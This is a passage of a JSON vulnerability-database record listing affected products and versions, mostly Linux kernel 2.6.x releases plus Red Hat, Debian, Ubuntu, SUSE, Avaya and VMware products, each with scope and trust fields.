        "version": "4.0 (x86-64)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4 (as)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4 (es)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4 (ws)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4.8 (as)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4.8 (es)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5 (server)"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4.0"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5.0 (client)"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5.4.z (server)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.6.29.rc1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "linux hppa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel -test6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.4"
      },
      {
        "model": "linux enterprise server unsupported extras",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "proactive contact",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.1.1"
      },
      {
        "model": "kernel 2.6.18-8.1.8.el5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.1"
      },
      {
        "model": "kernel 2.6.21-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "voice portal sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.1"
      },
      {
        "model": "messaging storage server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.8"
      },
      {
        "model": "meeting exchange sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "kernel -test3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.5"
      },
      {
        "model": "voice portal sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "1.1"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.6"
      },
      {
        "model": "kernel 2.6.31-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.4"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.2.2"
      },
      {
        "model": "linux lts amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.2"
      },
      {
        "model": "linux alpha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.6"
      },
      {
        "model": "linux mipsel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29.1"
      },
      {
        "model": "kernel -rc6-git6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "aura communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.4"
      },
      {
        "model": "linux enterprise desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.4"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.267"
      },
      {
        "model": "message networking",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.1"
      },
      {
        "model": "meeting exchange sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.7"
      },
      {
        "model": "meeting exchange",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0.0.52"
      },
      {
        "model": "kernel -test9-cvs",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.214"
      },
      {
        "model": "voice portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "kernel 2.6.32-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "aura sip enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "kernel 2.6.22-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel 2.6.31-rc9",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.16"
      },
      {
        "model": "linux lpia",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.3"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "messaging storage server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel 2.6.24-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.09"
      },
      {
        "model": "kernel -test2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel 2.6.29-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.3"
      },
      {
        "model": "kernel -git7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.9"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "meeting exchange sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "linux armel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel 2.6.31-git11",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.12"
      },
      {
        "model": "kernel 2.6.29-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.13"
      },
      {
        "model": "kernel 2.6.31-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.31-rc5-git3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.12"
      },
      {
        "model": "voice portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "aura sip enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "esx server esx410-201101201",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.11"
      },
      {
        "model": "intuity audix lx sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "2.0"
      },
      {
        "model": "kernel -git1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.18"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.11"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.5"
      },
      {
        "model": "kernel 2.6.32-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.1"
      },
      {
        "model": "kernel -git14",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.273"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "linux lts i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "enterprise linux ws",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "4"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.5"
      },
      {
        "model": "kernel -test5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "enterprise linux es",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "4"
      },
      {
        "model": "kernel -rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.8"
      },
      {
        "model": "linux lts sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.2"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel 2.6.22-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -test8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "linux lts i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.3"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.7"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20-2"
      },
      {
        "model": "kernel -rc8-git5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.12"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.1"
      },
      {
        "model": "meeting exchange",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel -rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.6"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.10"
      },
      {
        "model": "linux alpha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.1"
      },
      {
        "model": "meeting exchange sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.4"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.10"
      },
      {
        "model": "kernel -test1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3"
      },
      {
        "model": "messaging storage server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.14"
      },
      {
        "model": "esx server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.0"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "proactive contact",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.4"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "11.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.11"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.9"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "aura communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.3"
      },
      {
        "model": "hat enterprise linux eus 5.4.z server",
        "scope": null,
        "trust": 0.3,
        "vendor": "red",
        "version": null
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.3"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "enterprise mrg for red hat enterprise linux version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "v15"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.14"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.2.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2712"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18-53"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.5"
      },
      {
        "model": "message networking",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.4"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "meeting exchange",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.2"
      },
      {
        "model": "esx server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.5"
      },
      {
        "model": "kernel -rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel 2.6.25-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.4"
      },
      {
        "model": "kernel 2.6.32-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "proactive contact",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.1"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.14"
      },
